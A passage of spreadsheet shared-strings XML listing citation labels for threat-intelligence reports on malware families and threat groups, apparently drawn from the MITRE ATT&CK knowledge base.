    <t>(Citation: Sophos New Ryuk Attack October 2020),(Citation: CrowdStrike Grim Spider May 2019),,(Citation: Picus Emotet Dec 2018),(Citation: Red Canary Emotet Feb 2019),(Citation: Symantec Emotet Jul 2018),(Citation: Trend Micro Emotet Jan 2019),(Citation: ESET Emotet Dec 2018),(Citation: ASEC Emotet 2017),(Citation: Carbon Black Emotet Apr 2019),(Citation: IBM IcedID November 2017),(Citation: Secureworks Emotet Nov 2018),(Citation: CIS Emotet Dec 2018),(Citation: Malwarebytes Emotet Dec 2017),(Citation: CIS Emotet Apr 2017),(Citation: Trend Micro Banking Malware Jan 2019),(Citation: Fortinet Emotet May 2017),(Citation: Kaspersky Emotet Jan 2019),(Citation: US-CERT Emotet Jul 2018),(Citation: Talos Emotet Jan 2019)</t>
  </si>
  <si>
    <t>(Citation: Group IB Silence Aug 2019),(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: CISA AA21-200A APT40 July 2021),(Citation: ESET Crutch December 2020),(Citation: CrowdStrike Grim Spider May 2019),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: ESET Turla August 2018),(Citation: Lab52 WIRTE Apr 2019),(Citation: Symantec Elfin Mar 2019),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: SecureWorks August 2019),(Citation: NCSC Joint Report Public Tools),(Citation: FireEye FIN10 June 2017),(Citation: Crowdstrike Indrik November 2018),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: ClearSky Wilted Tulip July 2017),(Citation: FireEye APT33 Guardrail),(Citation: Talos Frankenstein June 2019),(Citation: SecureWorks August 2019),(Citation: GitHub Inveigh),(Citation: NCSC Joint Report Public Tools),(Citation: Github PowerShell Empire),(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>(Citation: Secureworks IRON HUNTER Profile),(Citation: Kaspersky Turla),,(Citation: Kaspersky Turla Aug 2014),(Citation: ESET Recon Snake Nest),(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>,,(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>(Citation: PWC Cloud Hopper Technical Annex April 2017),,(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>(Citation: ESET TeleBots Oct 2018),(Citation: ANSSI Sandworm January 2021),,(Citation: ESET TeleBots Oct 2018),(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>(Citation: ESET TeleBots Oct 2018),,(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>,,(Citation: Microsoft Expand Utility),(Citation: LOLBAS Expand)</t>
  </si>
  <si>
    <t>(Citation: CheckPoint Volatile Cedar March 2015),(Citation: ClearSky Lebanese Cedar Jan 2021),,(Citation: CheckPoint Volatile Cedar March 2015),(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t>(Citation: US-CERT FALLCHILL Nov 2017),,(Citation: CISA AppleJeus Feb 2021),(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>,,(Citation: ESET GreyEnergy Oct 2018),(Citation: FireEye FELIXROOT July 2018)</t>
  </si>
  <si>
    <t>,,(Citation: FireEye FiveHands April 2021),(Citation: NCC Group Fivehands June 2021),(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>(Citation: Mandiant FIN5 GrrCON Oct 2016),,(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>(Citation: ESET Dukes October 2019),(Citation: Secureworks IRON HEMLOCK Profile),,(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>(Citation: Symantec Sowbug Nov 2017),,(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky WIRTE November 2021),,(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>,,(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>(Citation: Lookout Dark Caracal Jan 2018),,(Citation: Microsoft FinFisher March 2018),(Citation: Securelist BlackOasis Oct 2017),(Citation: Elastic Process Injection July 2017),(Citation: FinFisher Citation),(Citation: FinFisher exposed )</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Nokki Oct 2018),,(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>(Citation: NTT Security Flagpro new December 2021),,(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>,,(Citation: Crysys Skywiper),(Citation: Kaspersky Flame),(Citation: Kaspersky Flame Functionality),(Citation: Symantec Beetlejuice)</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA505 Mar 2018),(Citation: Proofpoint TA505 October 2019),(Citation: Visa FIN6 Feb 2019),(Citation: Trend Micro TA505 June 2019),,(Citation: Proofpoint TA505 Mar 2018),(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA505 Jan 2019),(Citation: Proofpoint TA505 October 2019),(Citation: Trend Micro TA505 June 2019),,(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>(Citation: MSTIC FoggyWeb September 2021),,(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>(Citation: Überwachung APT28 Forfiles June 2015),,(Citation: VectorSec ForFiles Aug 2017),(Citation: Überwachung APT28 Forfiles June 2015),(Citation: Evi1cg Forfiles Nov 2017)</t>
  </si>
  <si>
    <t>(Citation: Visa FIN6 Feb 2019),(Citation: SentinelOne FrameworkPOS September 2019),(Citation: Crowdstrike Global Threat Report Feb 2018),,(Citation: SentinelOne FrameworkPOS September 2019),(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>,,(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>,(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Kaspersky APT Trends Q1 2020)</t>
  </si>
  <si>
    <t>(Citation: Fysbis Palo Alto Analysis),,(Citation: Fysbis Palo Alto Analysis),(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>(Citation: Mandiant APT1),,(Citation: CyberESI GTALK),(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>(Citation: FBI Flash FIN7 USB),(Citation: SecureList Griffon May 2019),(Citation: CrowdStrike Carbon Spider August 2021),,(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>(Citation: ESET Gazer Aug 2017),,(Citation: Securelist WhiteBear Aug 2017),(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA505 October 2019),,(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Secureworks IRON RITUAL Profile),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: Cybersecurity Advisory SVR TTP May 2021),,(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>(Citation: MSTIC NOBELIUM May 2021),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Secureworks IRON RITUAL Profile),,(Citation: CrowdStrike StellarParticle January 2022),(Citation: FireEye SUNSHUTTLE Mar 2021),(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>,,(Citation: Trustwave GoldenSpy2 June 2020),(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Cobalt Kitty 2017),,(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>,,(Citation: IBM Grandoreiro April 2020),(Citation: ESET Grandoreiro April 2020),(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>,,(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>,,(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021)</t>
  </si>
  <si>
    <t>(Citation: Secureworks IRON VIKING ),,(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>(Citation: Group IB GrimAgent July 2021),,(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>,,(Citation: Medium Eli Salem GuLoader April 2021),(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>,,(Citation: Cisco H1N1 Part 1),(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN7 April 2017),(Citation: FireEye FIN7 Aug 2018),,(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>(Citation: F-Secure The Dukes),(Citation: Secureworks IRON HEMLOCK Profile),,(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>(Citation: US-CERT HARDRAIN March 2018),,(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>,,(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>(Citation: Baumgartner Naikon 2015),,(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>(Citation: ESET Sednit Part 3),,(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>(Citation: FireEye Periscope March 2018),,(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: CISA AA20-239A BeagleBoyz August 2020),,(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>(Citation: Microsoft GALLIUM December 2019),(Citation: Cybereason Soft Cell June 2019),(Citation: Trend Micro IXESHE 2012),,(Citation: Operation Quantum Entanglement),(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>(Citation: RSA2017 Detect and Respond Adair),(Citation: Nccgroup Emissary Panda May 2018),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Dell TG-3390),(Citation: SecureWorks BRONZE UNION June 2017),,(Citation: ThreatStream Evasion Analysis),(Citation: ZScaler Hacking Team),(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>,,(Citation: TrendMicro Hacking Team UEFI)</t>
  </si>
  <si>
    <t>,,(Citation: FireEye Hancitor),(Citation: Threatpost Hancitor),(Citation: Red Canary Verclsid.exe)</t>
  </si>
  <si>
    <t>(Citation: Check Point Rocket Kitten),,(Citation: Check Point Havij Analysis)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike Helix Kitten Nov 2018),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Palo Alto OilRig May 2016),,(Citation: ClearSky OilRig Jan 2017),(Citation: Palo Alto OilRig May 2016),(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>,,(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Qualys Hermetic Wiper March 2022),(Citation: SentinelOne Hermetic Wiper February 2022),(Citation: ESET Hermetic Wiper February 2022),(Citation: ESET Hermetic Wizard March 2022),(Citation: Symantec Ukraine Wipers February 2022)</t>
  </si>
  <si>
    <t>,,(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>(Citation: SentinelOne Aoqin Dragon June 2022),,(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>,,(Citation: Fidelis INOCNATION),(Citation: Fidelis Hi-Zor)</t>
  </si>
  <si>
    <t>,,(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>(Citation: Novetta-Axiom),(Citation: Cisco Group 72),,(Citation: Novetta-Axiom),(Citation: FireEye Hikit Rootkit),(Citation: FireEye HIKIT Rootkit Part 2)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Hildegard Malware),,(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>(Citation: US-CERT HOTCROISSANT February 2020),,(Citation: US-CERT HOTCROISSANT February 2020),(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>(Citation: Novetta-Axiom),(Citation: Symantec Elderwood Sept 2012),(Citation: Cisco Group 72),,(Citation: Symantec Hydraq Persistence Jan 2010),(Citation: Symantec Trojan.Hydraq Jan 2010),(Citation: Symantec Elderwood Sept 2012),(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>(Citation: Unit42 Emissary Panda May 2019),(Citation: Hacker News LuckyMouse June 2018),(Citation: Trend Micro DRBControl February 2020),(Citation: Securelist LuckyMouse June 2018),(Citation: Trend Micro Iron Tiger April 2021),,(Citation: Trend Micro Iron Tiger April 2021),(Citation: Unit42 Emissary Panda May 2019),(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>(Citation: Accenture HyperStack October 2020),,(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>(Citation: OilRig New Delivery Oct 2017),,(Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>,,(Citation: CrowdStrike IceApple May 2022)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Valak May 2020),(Citation: Unit 42 Valak July 2020),(Citation: Unit 42 TA551 Jan 2021),(Citation: Secureworks GOLD CABIN),,(Citation: Juniper IcedID June 2020),(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>(Citation: QiAnXin APT-C-36 Feb2019),,(Citation: Imminent Unit42 Dec2019),(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>(Citation: Unit42 Emissary Panda May 2019),(Citation: US-CERT TA18-074A),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Bitdefender FIN8 July 2021),(Citation: Core Security Impacket),(Citation: Tarrask scheduled task),(Citation: FoxIT Wocao December 2019),(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>(Citation: ESET Industroyer),(Citation: Dragos Crashoverride 2018),(Citation: Dragos Crashoverride 2017),(Citation: Secureworks IRON VIKING),,(Citation: ESET Industroyer),(Citation: Dragos Crashoverride 2017)</t>
  </si>
  <si>
    <t>,,(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>,,(Citation: ESET InvisiMole June 2020),(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020),,(Citation: GitHub PSImage),(Citation: GitHub Invoke-PSImage)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 IronNetInjector February 2021 ),,(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>(Citation: Moran 2014),(Citation: Moran 2013),,(Citation: Moran 2013),(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>,,(Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Oct 2018),(Citation: FireEye APT28 January 2017),(Citation: Kaspersky Sofacy),(Citation: Secureworks IRON TWILIGHT Active Measures March 2017),(Citation: Securelist Sofacy Feb 2018),,(Citation: Unit 42 Sofacy Feb 2018),(Citation: F-Secure Sofacy 2015),(Citation: Unit 42 Playbook Dec 2017),(Citation: Talos Seduploader Oct 2017),(Citation: ESET Sednit Part 1),(Citation: ESET Sednit July 2015)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Carbon Spider August 2021),,(Citation: eSentire FIN7 July 2021),(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>,,(Citation: Janicab),(Citation: f-secure janicab)</t>
  </si>
  <si>
    <t>,,(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>(Citation: US-CERT KEYMARBLE Aug 2018),,(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>(Citation: MalwareBytes LazyScripter Feb 2021),,(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT32 May 2017),,(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>,,(Citation: Medium KONNI Jan 2020),(Citation: Talos Konni May 2017),(Citation: Malwarebytes KONNI Evolves Jan 2022),(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t>,,(Citation: Microsoft Kasidet),(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>(Citation: Talos TinyTurla September 2021),(Citation: Unit 42 Kazuar May 2017),,(Citation: Accenture HyperStack October 2020),(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 KerrDown February 2019),(Citation: Amnesty Intl. Ocean Lotus February 2021),,(Citation: Unit 42 KerrDown February 2019),(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Lyceum October 2021),,(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>(Citation: CitizenLab Tropic Trooper Aug 2018),(Citation: Unit 42 Tropic Trooper Nov 2016),,(Citation: Rapid7 KeyBoy Jun 2013),(Citation: PWC KeyBoys Feb 2017),(Citation: CitizenLab KeyBoy Nov 2016)</t>
  </si>
  <si>
    <t>,,(Citation: OSX Keydnap malware),(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Secureworks IRON VIKING ),(Citation: ESET Lazarus KillDisk April 2018),,(Citation: KillDisk Ransomware),(Citation: ESET Telebots Dec 2016),(Citation: Trend Micro KillDisk 2),(Citation: Trend Micro KillDisk 1),(Citation: ESEST Black Energy Jan 2016)</t>
  </si>
  <si>
    <t>,,(Citation: Sysdig Kinsing November 2020),(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>(Citation: Symantec Palmerworm Sep 2020),(Citation: TrendMicro BlackTech June 2017),,(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>(Citation: Reaqta MuddyWater November 2017),(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: ATT Sidewinder January 2021),(Citation: Palo Alto Sofacy 06-2018),,(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>,,(Citation: ESET Kobalos Jan 2021),(Citation: ESET Kobalos Feb 2021)</t>
  </si>
  <si>
    <t>(Citation: XAgentOSX 2017),(Citation: Secureworks IRON TWILIGHT Active Measures March 2017),(Citation: Sofacy Komplex Trojan),,(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>(Citation: Symantec Orangeworm April 2018),,(Citation: Symantec Security Center Trojan.Kwampirs),(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>(Citation: Symantec MuddyWater Dec 2018),(Citation: Symantec Leafminer July 2018),(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: ESET EvilNum July 2020),(Citation: TrendMicro Tonto Team October 2020),(Citation: Symantec Buckeye),(Citation: ATT TeamTNT Chimaera September 2020),(Citation: Symantec Elfin Mar 2019),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: FireEye APT35 2018),,(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>(Citation: ESET LightNeuron May 2019),(Citation: Secureworks IRON HUNTER Profile),,(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>(Citation: Symantec Elderwood Sept 2012),,(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>,,(Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>(Citation: Threatpost Lizar May 2021),(Citation: Gemini FIN7 Oct 2021),,(Citation: Threatpost Lizar May 2021),(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t>(Citation: ESET LoJax Sept 2018),,(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN6 Apr 2019),,(Citation: CarbonBlack LockerGoga 2019),(Citation: Wired Lockergoga 2019),(Citation: Unit42 LockerGoga 2019)</t>
  </si>
  <si>
    <t>(Citation: Unit42 SilverTerrier 2018),,(Citation: FSecure Lokibot November 2019),(Citation: Infoblox Lokibot January 2019),(Citation: TrendMicro Msiexec Feb 2018),(Citation: Talos Lokibot Jan 2021)</t>
  </si>
  <si>
    <t>,,(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>,,(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>,,(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>(Citation: Villeneuve 2014),,(Citation: Villeneuve 2011)</t>
  </si>
  <si>
    <t>(Citation: Secureworks MCMD July 2019),,(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: FireEye MESSAGETAP October 2019),,(Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>(Citation: CISA AA21-200A APT40 July 2021),(Citation: FireEye Periscope March 2018),,(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>,,(Citation: SentinelOne MacMa Nov 2021),(Citation: Objective-See MacMa Nov 2021),(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>,,(Citation: alientvault macspy),(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>(Citation: ESET Machete July 2019),(Citation: Securelist Machete Aug 2014),,(Citation: ESET Machete July 2019),(Citation: 360 Machete Sep 2020),(Citation: Securelist Machete Aug 2014),(Citation: Cylance Machete Mar 2017)</t>
  </si>
  <si>
    <t>(Citation: Symantec Leafminer July 2018),,(Citation: Black Hills Attacking Exchange MailSniper, 2016),(Citation: GitHub MailSniper)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Ferocious Kitten Jun 2021),,(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>(Citation: ClearSky Wilted Tulip July 2017),,(Citation: ClearSky Wilted Tulip July 2017),(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>(Citation: FireEye Maze May 2020),,(Citation: Sophos Maze VM September 2020),(Citation: FireEye Maze May 2020),(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 MechaFlounder March 2019),,(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>,,(Citation: IBM MegaCortex),(Citation: mbed-crypto)</t>
  </si>
  <si>
    <t>,,(Citation: Medium Metamorfo Apr 2020),(Citation: FireEye Metamorfo Apr 2018),(Citation: ESET Casbaneiro Oct 2019),(Citation: Fortinet Metamorfo Feb 2020)</t>
  </si>
  <si>
    <t>,,(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>,,(Citation: Radware Micropsia July 2018),(Citation: Talos Micropsia June 2017)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Lyceum October 2021),(Citation: Accenture Lyceum Targets November 2021),,(Citation: Kaspersky Lyceum October 2021),(Citation: Accenture Lyceum Targets November 2021),(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>(Citation: Palo Alto Black-T October 2020),,(Citation: MimiPenguin GitHub May 2017)</t>
  </si>
  <si>
    <t>(Citation: Cycraft Chimera April 2020),(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: Cybereason Oceanlotus May 2017),(Citation: Nccgroup Emissary Panda May 2018),(Citation: Trend Micro DRBControl February 2020),(Citation: BitDefender Chafer May 2020),(Citation: Dragos Crashoverride 2018),(Citation: Kaspersky Sofacy),(Citation: KISA Operation Muzabi),(Citation: PTSecurity Cobalt Dec 2016),(Citation: Microsoft 365 Defender Solorigate),(Citation: Unit 42 MuddyWater Nov 2017),(Citation: F-Secure The Dukes),(Citation: Kaspersky CactusPete Aug 2020),(Citation: Microsoft GALLIUM December 2019),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Profero APT27 December 2020),(Citation: Unit 42 DarkHydrus July 2018),(Citation: FireEye APT32 May 2017),(Citation: Cybereason Soft Cell June 2019),(Citation: Symantec Leafminer July 2018),(Citation: Kaspersky Lyceum October 2021),(Citation: ESET Turla Mosquito May 2018),(Citation: Mandiant APT1),(Citation: Group IB Cobalt Aug 2017),(Citation: FireEye APT41 Aug 2019),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: TrendMicro EarthLusca 2022),(Citation: Symantec Whitefly March 2019),(Citation: Symantec Chafer February 2018),(Citation: Trend Micro Tick November 2019),(Citation: Crowdstrike Indrik November 2018),(Citation: FireEye APT35 2018),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Bizeul 2014),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: NCC Group TA505),(Citation: Symantec Thrip June 2018),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Dark Reading APT39 JAN 2019),(Citation: NCC Group APT15 Alive and Strong),(Citation: Symantec Elfin Mar 2019),(Citation: Kaspersky Carbanak),(Citation: PTSecurity Cobalt Group Aug 2017),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: FireEye APT39 Jan 2019),(Citation: Symantec Waterbug Jun 2019),(Citation: Unit 42 Playbook Dec 2017),(Citation: FireEye APT38 Oct 2018),(Citation: RedCanary Mockingbird May 2020),(Citation: Secureworks IRON LIBERTY July 2019),(Citation: Cylance Cleaver),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: Netscout Stolen Pencil Dec 2018),(Citation: Talent-Jump Clambling February 2020),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: FireEye TRITON 2019),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Group IB APT 41 June 2021),(Citation: Symantec Tick Apr 2016),(Citation: Microsoft NICKEL December 2021),(Citation: NCC Group Chimera January 2021),(Citation: FoxIT Wocao December 2019),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Metcalf 2015),(Citation: GitHub Mimikatz kerberos Module),(Citation: Adsecurity Mimikatz Guide),(Citation: Harmj0y DCSync Sept 2015),(Citation: Delpy Mimikatz Crendential Manager),(Citation: NCSC Joint Report Public Tools),(Citation: GitHub Mimikatz lsadump Module),(Citation: AdSecurity Kerberos GT Aug 2015),(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015),(Citation: Deply Mimikatz)</t>
  </si>
  <si>
    <t>,,(Citation: Softpedia MinerC)</t>
  </si>
  <si>
    <t>(Citation: F-Secure The Dukes),(Citation: ESET Dukes October 2019),(Citation: Secureworks IRON HEMLOCK Profile),,(Citation: F-Secure The Dukes),(Citation: ESET Dukes October 2019),(Citation: Securelist MiniDuke Feb 2013)</t>
  </si>
  <si>
    <t>(Citation: APT15 Intezer June 2018),,(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>,(Citation: Cylance Dust Storm),(Citation: Cylance Dust Storm),(Citation: Microsoft DTC)</t>
  </si>
  <si>
    <t>(Citation: Symantec Black Vine),,(Citation: Symantec Backdoor.Mivast)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Molerats Dec 2020),,(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>,,(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>(Citation: Security Intelligence More Eggs Aug 2019),(Citation: Visa FIN6 Feb 2019),(Citation: ESET EvilNum July 2020),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Talos Cobalt Group July 2018),,(Citation: ESET EvilNum July 2020),(Citation: Talos Cobalt Group July 2018),(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>(Citation: DHS CISA AA22-055A MuddyWater February 2022),,(Citation: CYBERCOM Iranian Intel Cyber January 2022),(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>(Citation: ESET Turla Mosquito May 2018),(Citation: ESET Turla Mosquito Jan 2018),(Citation: Secureworks IRON HUNTER Profile),,(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>,,(Citation: Mythc Documentation)</t>
  </si>
  <si>
    <t>(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: Cybereason Soft Cell June 2019),(Citation: TrendMicro Tonto Team October 2020),(Citation: Trend Micro DRBControl February 2020),(Citation: Symantec Waterbug Jun 2019),(Citation: FireEye APT39 Jan 2019),(Citation: TrendMicro EarthLusca 2022),(Citation: Dell TG-3390),(Citation: ESET BackdoorDiplomacy Jun 2021),,(Citation: Debian nbtscan Nov 2019),(Citation: SecTools nbtscan June 2003)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Patchwork Dec 2017),,(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>(Citation: Unit42 SilverTerrier 2018),(Citation: FireEye APT33 Webinar Sept 2017),(Citation: Cylance Shaheen Nov 2018),(Citation: FireEye APT33 Sept 2017),,(Citation: FireEye NETWIRE March 2019),(Citation: McAfee Netwire Mar 2015),(Citation: FireEye APT33 Webinar Sept 2017),(Citation: Unit 42 NETWIRE April 2020),(Citation: Red Canary NETWIRE January 2020),(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike GTR2020 Mar 2020),,(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>(Citation: Symantec Elderwood Sept 2012),,(Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
